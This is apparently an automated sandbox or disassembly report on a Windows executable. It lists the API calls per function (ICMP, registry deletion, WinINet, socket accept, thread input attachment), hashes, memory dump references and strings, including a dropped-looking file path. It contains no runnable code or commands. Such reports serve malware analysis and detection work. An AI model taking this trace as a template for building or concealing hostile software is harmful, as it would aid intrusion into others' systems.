                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00440AB1
                • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00440AC7
                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00440AD5
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: MessageSend
                • String ID: msctls_trackbar32
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 004014F7: _malloc.LIBCMT ref: 00401511
                • CLSIDFromString.OLE32(?,00000000), ref: 00425244
                • SafeArrayAccessData.OLEAUT32(?,?), ref: 00425293
                • SafeArrayUnaccessData.OLEAUT32(?), ref: 004252C2
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                • String ID: crts
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 0042120B
                • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 0042121D
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: AddressLibraryLoadProc
                • String ID: ICMP.DLL$IcmpSendEcho
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 0042126F
                • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00421281
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: AddressLibraryLoadProc
                • String ID: ICMP.DLL$IcmpCreateFile
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 0042123D
                • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 0042124F
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: AddressLibraryLoadProc
                • String ID: ICMP.DLL$IcmpCloseHandle
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00420BFE
                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00420C10
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: AddressLibraryLoadProc
                • String ID: RegDeleteKeyExW$advapi32.dll
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00420D46
                • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00420D58
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: AddressLibraryLoadProc
                • String ID: GetSystemWow64DirectoryW$kernel32.dll
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00420DD2
                • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00420DE4
                Strings
                Similarity
                • API ID: AddressLibraryLoadProc
                • String ID: GetModuleHandleExW$kernel32.dll
                • API String ID: 2574300362-199464113
                • Opcode ID: f155e26033aa3bff8ff49337ea4be77e279103363f8d3da58cce7f3cdc8b63db
                • Instruction ID: 4ded76679cf27212a54155db890fc5a5b0ea5dfc3d264263fdf7e4aa752984fb
                • Opcode Fuzzy Hash: f155e26033aa3bff8ff49337ea4be77e279103363f8d3da58cce7f3cdc8b63db
                • Instruction Fuzzy Hash: C5E012715407169BD7105FA5E804B8677D8DB10751F50842AE949E2651DBB8E4C0CBAD
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • LoadLibraryA.KERNEL32(kernel32.dll,003FE7C8), ref: 0040087B
                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0040088D
                Strings
                Similarity
                • API ID: AddressLibraryLoadProc
                • String ID: IsWow64Process$kernel32.dll
                • API String ID: 2574300362-3024904723
                • Opcode ID: 42815604cae0318e973565c634e308a5d4f77cd422ffd84f1d5a09e660a10d1c
                • Instruction ID: 059e8694b438a645289228dc80f0995b23259ef6aeb758d46e748428dfd2e2e8
                • Opcode Fuzzy Hash: 42815604cae0318e973565c634e308a5d4f77cd422ffd84f1d5a09e660a10d1c
                • Instruction Fuzzy Hash: 88D0C9B0D00B029AE7202F31D90870376E4AB00752F24C87AA88DA52A0EBFCC0C08A69
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • LoadLibraryA.KERNEL32(kernel32.dll,003FE820), ref: 004008EB
                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 004008FD
                Strings
                Similarity
                • API ID: AddressLibraryLoadProc
                • String ID: GetNativeSystemInfo$kernel32.dll
                • API String ID: 2574300362-192647395
                • Opcode ID: 23a4d604d16be24fe9e3963d98cec0d1491b0496671a0a10b1e46b5902091fbf
                • Instruction ID: bdabf9809bc49700b89bfe5dc289a40c5bace340c49b0db9f20f76317925f9a7
                • Opcode Fuzzy Hash: 23a4d604d16be24fe9e3963d98cec0d1491b0496671a0a10b1e46b5902091fbf
                • Instruction Fuzzy Hash: BFD0C9F0D00F069EE7201F31D90870376E4AB00781F20843AA88AA52A5EBFCC0D08A69
                Uniqueness

                Uniqueness Score: -1.00%

                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9c67f30d9d2a33680fbb230f252aed81a3381bcf31a0ccac2350b05e0a0a39e5
                • Instruction ID: 28ab2457cb7f771ad2fc893ff91cfc37f7b1154191a17fed16f56bf6ebd48f9d
                • Opcode Fuzzy Hash: 9c67f30d9d2a33680fbb230f252aed81a3381bcf31a0ccac2350b05e0a0a39e5
                • Instruction Fuzzy Hash: 10E18075600209AFDB14DF98D880EAAB7B9FF88314F10859AF909CB351D775EE81CB94
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • VariantInit.OLEAUT32(?), ref: 004694C9
                • SysAllocString.OLEAUT32(00000000), ref: 00469592
                • VariantCopy.OLEAUT32(?,?), ref: 004695C9
                • VariantClear.OLEAUT32(?), ref: 0046960A
                Similarity
                • API ID: Variant$AllocClearCopyInitString
                • String ID:
                • API String ID: 2808897238-0
                • Opcode ID: 7e7644ac1de94d0586a92694c2572832cf4fca40ab9fe183af627052c9639baf
                • Instruction ID: d5c8de48a1ab6ebd574fbb708a8ae722ef53ca9355ffd93a426679ae20421091
                • Opcode Fuzzy Hash: 7e7644ac1de94d0586a92694c2572832cf4fca40ab9fe183af627052c9639baf
                • Instruction Fuzzy Hash: AF51C436200209A6CB00FF69D8416AAB768EF84351F50853BFE09DB252EB74DE55C7E7
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetWindowRect.USER32 ref: 004399A3
                • ScreenToClient.USER32 ref: 004399D9
                • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00439A45
                Similarity
                • API ID: Window$ClientMoveRectScreen
                • String ID:
                • API String ID: 3880355969-0
                • Opcode ID: 4e340cec482aa789a49cebca498f47be2cc9b163211c65e423b1127bcc0be7ad
                • Instruction ID: e9837b0f23820f0986cefc8808baab8808613da701a516dcd35af1aa21605fa5
                • Opcode Fuzzy Hash: 4e340cec482aa789a49cebca498f47be2cc9b163211c65e423b1127bcc0be7ad
                • Instruction Fuzzy Hash: 845159716002469FCB14DF58C881AAF77A9FF99314F10922EF8559B390D7B4AD90CB94
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Similarity
                • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                • String ID:
                • API String ID: 2782032738-0
                • Opcode ID: 5577a25a8bf7660d1eb98eb86be2243cf7e8e14d6244587b41df67c47af93e11
                • Instruction ID: dee04dfacab4e6d6fc2dcd6505ed9022ba17daed1e5e3308399555c6a243befb
                • Opcode Fuzzy Hash: 5577a25a8bf7660d1eb98eb86be2243cf7e8e14d6244587b41df67c47af93e11
                • Instruction Fuzzy Hash: AE41D6B1A006049BDB248F65C94865FB7B5AFD0364F24853EE615BB2C0D778DD91CB88
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • ClientToScreen.USER32(00000000,?), ref: 00431621
                • GetWindowRect.USER32 ref: 004316A9
                • PtInRect.USER32(?,?,?), ref: 004316BB
                • MessageBeep.USER32(00000000), ref: 00431734
                Similarity
                • API ID: Rect$BeepClientMessageScreenWindow
                • String ID:
                • API String ID: 1352109105-0
                • Opcode ID: 495c07c42b34bf515258437dbb2ffdbb60d585d8c4cbae78dddb53b60996e938
                • Instruction ID: 8ec5cffee824b0a5ce7736eec7428de288d035f893a315074fc421ca1c2e46f2
                • Opcode Fuzzy Hash: 495c07c42b34bf515258437dbb2ffdbb60d585d8c4cbae78dddb53b60996e938
                • Instruction Fuzzy Hash: F24183756002049FD714CF99D885EAAB7B5FF99310F1882BBD9158B360C734AC42CBA8
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00410793
                • __isleadbyte_l.LIBCMT ref: 004107C6
                • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000,?,?,?,00000000,?,00000000), ref: 004107F7
                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,00000000,00000000,?,?,?,00000000,?,00000000), ref: 00410865
                Similarity
                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                • String ID:
                • API String ID: 3058430110-0
                • Opcode ID: 4f03f7ac565ae93dd9220e4c6dcc94ee0e41e109e982c3fef52ece8f77727fc4
                • Instruction ID: 99d885763b9abcc3c5d5f237dbb6ffc9cfb949785a1223b31a1f3233b4ed8615
                • Opcode Fuzzy Hash: 4f03f7ac565ae93dd9220e4c6dcc94ee0e41e109e982c3fef52ece8f77727fc4
                • Instruction Fuzzy Hash: EA31D331A04245EFCB20DF64C880AEA7BA5BF01310B1885BBE4659B2D1D774EDD0DB99
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetParent.USER32(?), ref: 0044033E
                • DefDlgProcW.USER32(?,00000138,?,?), ref: 0044038D
                • DefDlgProcW.USER32(?,00000133,?,?), ref: 004403DC
                • DefDlgProcW.USER32(?,00000134,?,?), ref: 0044040D
                Similarity
                • API ID: Proc$Parent
                • String ID:
                • API String ID: 2351499541-0
                • Opcode ID: 1a285a123b89665f3c92d2cdcfe74bde0e4547506e0cfcbbb530fc5c2f9c12bc
                • Instruction ID: 8a77c48e12b35e5e2e90187d9f5991dc5037ac4bfb9a45fdd9a78c051bf907fb
                • Opcode Fuzzy Hash: 1a285a123b89665f3c92d2cdcfe74bde0e4547506e0cfcbbb530fc5c2f9c12bc
                • Instruction Fuzzy Hash: 1F3176362001046BD620DF29DC44DAB7B64EF95735F14422BFA658B3D2CB759C62C768
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Similarity
                • API ID: Message$Peek$DispatchTranslate
                • String ID:
                • API String ID: 1795658109-0
                • Opcode ID: 246ba564bc6380faf2fa79a19fe81fc39dc5e04bbbd89e58d20fd9845e5652d9
                • Instruction ID: c69db1d15f733f954549b4b643282eaa744379eef53ce6b50162aec55f151df6
                • Opcode Fuzzy Hash: 246ba564bc6380faf2fa79a19fe81fc39dc5e04bbbd89e58d20fd9845e5652d9
                • Instruction Fuzzy Hash: EB21A0729083465FEB30DB689E41FFB7BACDB18710F10443FE65486280E6B89845C769
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • _memset.LIBCMT ref: 003FE2E2
                • Shell_NotifyIconW.SHELL32(00000000,?), ref: 003FE3A7
                Similarity
                • API ID: IconNotifyShell__memset
                • String ID:
                • API String ID: 928536360-0
                • Opcode ID: 0116e38b9503e16218ef42211a03c5d9d91156802fe6f4a28b03824f7f18e9ad
                • Instruction ID: 0b1fb7e06b6c5140920d474a647f867f329f66068ece93684211d3a8dbb23c5a
                • Opcode Fuzzy Hash: 0116e38b9503e16218ef42211a03c5d9d91156802fe6f4a28b03824f7f18e9ad
                • Instruction Fuzzy Hash: 3331A174608704DFD321CF24D8597A7BBE8FB45318F00082EE6DA87290D7B4A948CF56
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00424C17: lstrlenW.KERNEL32(?), ref: 00424C2A
                  • Part of subcall function 00424C17: lstrcpyW.KERNEL32 ref: 00424C52
                  • Part of subcall function 00424C17: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00424C86
                • lstrlenW.KERNEL32(?), ref: 00424D04
                  • Part of subcall function 004014F7: _malloc.LIBCMT ref: 00401511
                • lstrcpyW.KERNEL32 ref: 00424D2C
                • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00424D72
                Strings
                Similarity
                • API ID: lstrcmpilstrcpylstrlen$_malloc
                • String ID: cdecl
                • API String ID: 3850814276-3896280584
                • Opcode ID: 21fa89e37a2654ffcd1b2e3fdbbd58515fe0bb47a050d1d49f0511941b3075cf
                • Instruction ID: f2e9ab0c961ada87b39922188807c844a1abd5d65ccacaa1267603f6cd1d8369
                • Opcode Fuzzy Hash: 21fa89e37a2654ffcd1b2e3fdbbd58515fe0bb47a050d1d49f0511941b3075cf
                • Instruction Fuzzy Hash: 2821F376211355ABD310AF25EC41EA773A9FF84314F40843EE90A8B650EB38E841C3A8
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00448AAA
                • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00448ABC
                • accept.WSOCK32(00000000,00000000,00000000), ref: 00448ACB
                • WSAGetLastError.WSOCK32(00000000), ref: 00448AF0
                Similarity
                • API ID: ErrorLastacceptselect
                • String ID:
                • API String ID: 385091864-0
                • Opcode ID: 0e9b9cb3286ad05336ba9b6af4fc0a740256da8e7103ce6d9d417aa9d6455920
                • Instruction ID: e15ccb9f86f63dd26e3f9dc5e6dda5ef3614823406c45fbfd40bbaf6fd9f42c2
                • Opcode Fuzzy Hash: 0e9b9cb3286ad05336ba9b6af4fc0a740256da8e7103ce6d9d417aa9d6455920
                • Instruction Fuzzy Hash: 742154716002089BD714DF68DD45BAAB7F8EF94710F14866EF949DB390DBB0A980CF94
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SendMessageW.USER32(?,000000B0,?,?), ref: 0042684C
                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0042685F
                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00426876
                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0042688E
                Similarity
                • API ID: MessageSend
                • String ID:
                • API String ID: 3850602802-0
                • Opcode ID: e32452221e4a94b32405e515279b44a158e93834cfe0dec0ac25b35f1ed36715
                • Instruction ID: 19fd3e6e895a7d6dd35b4456f2a81d9285005d816ebf0cf3c9f2adefea7e8971
                • Opcode Fuzzy Hash: e32452221e4a94b32405e515279b44a158e93834cfe0dec0ac25b35f1ed36715
                • Instruction Fuzzy Hash: 51113075601208BFDB10EF69DC85F9AB7E8EF98350F208156FD48DB340D671A9418BA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateWindowExW.USER32 ref: 004201AF
                • GetStockObject.GDI32(00000011), ref: 004201C5
                • SendMessageW.USER32(00000000,00000030,00000000), ref: 004201CF
                • ShowWindow.USER32(00000000,00000000), ref: 004201EA
                Similarity
                • API ID: Window$CreateMessageObjectSendShowStock
                • String ID:
                • API String ID: 1358664141-0
                • Opcode ID: 485d9a71cda43b1cf814e06499cd1d10d202d6bd9c937192b5c3f030e17a767e
                • Instruction ID: 43505e196f7a94ebf4bf1dd74e67069b926a8a29cb3410f3972b9782ba9b058e
                • Opcode Fuzzy Hash: 485d9a71cda43b1cf814e06499cd1d10d202d6bd9c937192b5c3f030e17a767e
                • Instruction Fuzzy Hash: 641154722005146BD715CF59DC49FDBB3A9AF98B10F14821AFA0893290D774E851CBA4
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetCurrentThreadId.KERNEL32 ref: 00433BAA
                • MessageBoxW.USER32(?,?,?,?), ref: 00433BE0
                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00433BF6
                • CloseHandle.KERNEL32(00000000), ref: 00433BFD
                Similarity
                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                • String ID:
                • API String ID: 2880819207-0
                • Opcode ID: 6c6016972624ddcb8088e3f0e2dc6581904755acf470c64aa294dad7507ebc35
                • Instruction ID: b6d8eb73323c189fce86d182722cb1b66591b6b2ea45ac378a6a7fa9b2392fb1
                • Opcode Fuzzy Hash: 6c6016972624ddcb8088e3f0e2dc6581904755acf470c64aa294dad7507ebc35
                • Instruction Fuzzy Hash: A311A072904118ABD710DF68ED08ADF7FADEF89631F14026AFD0893391E6B49A5087E5
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Similarity
                • API ID: ClientRectScreen$InvalidateWindow
                • String ID:
                • API String ID: 357397906-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • __wsplitpath.LIBCMT ref: 00423913
                  • Part of subcall function 0040392E: __wsplitpath_helper.LIBCMT ref: 00403970
                • __wsplitpath.LIBCMT ref: 00423935
                • __wcsicoll.LIBCMT ref: 00423959
                • __wcsicoll.LIBCMT ref: 0042396F
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                • String ID:
                • API String ID: 1187119602-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                • String ID:
                • API String ID: 3016257755-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: _wcslen$_malloc_wcscat_wcscpy
                • String ID:
                • API String ID: 1597257046-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • EnterCriticalSection.KERNEL32(?), ref: 0043B581
                • InterlockedExchange.KERNEL32(?,?), ref: 0043B58F
                • LeaveCriticalSection.KERNEL32(?), ref: 0043B5A6
                • LeaveCriticalSection.KERNEL32(?), ref: 0043B5B8
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                • String ID:
                • API String ID: 2223660684-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 004370BF: DeleteObject.GDI32(00000000), ref: 004370FC
                  • Part of subcall function 004370BF: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 0043713C
                  • Part of subcall function 004370BF: SelectObject.GDI32(?,00000000), ref: 0043714C
                  • Part of subcall function 004370BF: BeginPath.GDI32(?), ref: 00437161
                  • Part of subcall function 004370BF: SelectObject.GDI32(?,00000000), ref: 0043718A
                • MoveToEx.GDI32(?,?,?,00000000), ref: 0043723B
                • LineTo.GDI32(?,?,?), ref: 0043724A
                • EndPath.GDI32(?), ref: 0043725A
                • StrokePath.GDI32(?), ref: 00437268
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                • String ID:
                • API String ID: 2783949968-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: _memset$CloseCreateHandleProcess
                • String ID:
                • API String ID: 3277943733-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SendMessageTimeoutW.USER32 ref: 00426425
                • GetWindowThreadProcessId.USER32(?,00000000), ref: 00426438
                • GetCurrentThreadId.KERNEL32 ref: 0042643F
                • AttachThreadInput.USER32(00000000), ref: 00426446
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                • String ID:
                • API String ID: 2710830443-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00426BC2
                • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00426BD0
                • CloseHandle.KERNEL32(?,?,000000FF), ref: 00426BE0
                • CloseHandle.KERNEL32(?,?,000000FF), ref: 00426BE5
                  • Part of subcall function 00426ABB: GetProcessHeap.KERNEL32(00000000,?), ref: 00426AC8
                  • Part of subcall function 00426ABB: HeapFree.KERNEL32(00000000), ref: 00426ACF
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                • String ID:
                • API String ID: 146765662-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • __getptd_noexit.LIBCMT ref: 00405070
                  • Part of subcall function 00407913: GetLastError.KERNEL32(00000003,?,00407994,?,00401259,?,?,004012DC,?,00000001), ref: 00407917
                  • Part of subcall function 00407913: ___set_flsgetvalue.LIBCMT ref: 00407925
                  • Part of subcall function 00407913: __calloc_crt.LIBCMT ref: 00407939
                  • Part of subcall function 00407913: __initptd.LIBCMT ref: 00407962
                  • Part of subcall function 00407913: GetCurrentThreadId.KERNEL32 ref: 00407969
                  • Part of subcall function 00407913: SetLastError.KERNEL32(00000000,?,004012DC,?,00000001), ref: 00407981
                • CloseHandle.KERNEL32(?,?,004050BB), ref: 00405084
                • __freeptd.LIBCMT ref: 0040508B
                • ExitThread.KERNEL32 ref: 00405093
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit__initptd
                • String ID:
                • API String ID: 2246029678-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: _strncmp
                • String ID: Q\E
                • API String ID: 909875538-2189900498
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SendMessageW.USER32(?,00001132,00000000,?), ref: 0043839F
                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 004383B8
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: MessageSend
                • String ID: '
                • API String ID: 3850602802-1997036262
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetWindowTextLengthW.USER32(00000000), ref: 004412C0
                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004412D0
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: LengthMessageSendTextWindow
                • String ID: edit
                • API String ID: 2978978980-2167791130
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: _memmove
                • String ID: ?T
                • API String ID: 4104443479-3504941901
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0043257F
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: InternetOpen
                • String ID: <local>
                • API String ID: 2038078732-4266983199
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: __fread_nolock_memmove
                • String ID: EA06
                • API String ID: 1988441806-3962188686
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: _wcsncpy
                • String ID: C:\Users\user\31956653\thjfdg.xcp$y]A
                • API String ID: 1735881322-518368218
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • __lock.LIBCMT ref: 00401879
                  • Part of subcall function 004081EE: __mtinitlocknum.LIBCMT ref: 00408204
                  • Part of subcall function 004081EE: __amsg_exit.LIBCMT ref: 00408210
                  • Part of subcall function 004081EE: EnterCriticalSection.KERNEL32(?,?,?,004078A9,0000000D,?,004012DC,?,00000001), ref: 00408218
                  • Part of subcall function 00408115: LeaveCriticalSection.KERNEL32(?,004081EC,0000000A,004081DC,0047D180,0000000C,00408209,?,?,?,004078A9,0000000D,?,004012DC,?), ref: 00408124
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                Similarity
                • API ID: CriticalSection$EnterLeave__amsg_exit__lock__mtinitlocknum
                • String ID: d@$d@
                • API String ID: 2136571680-2768541783
                Uniqueness

                Uniqueness Score: -1.00%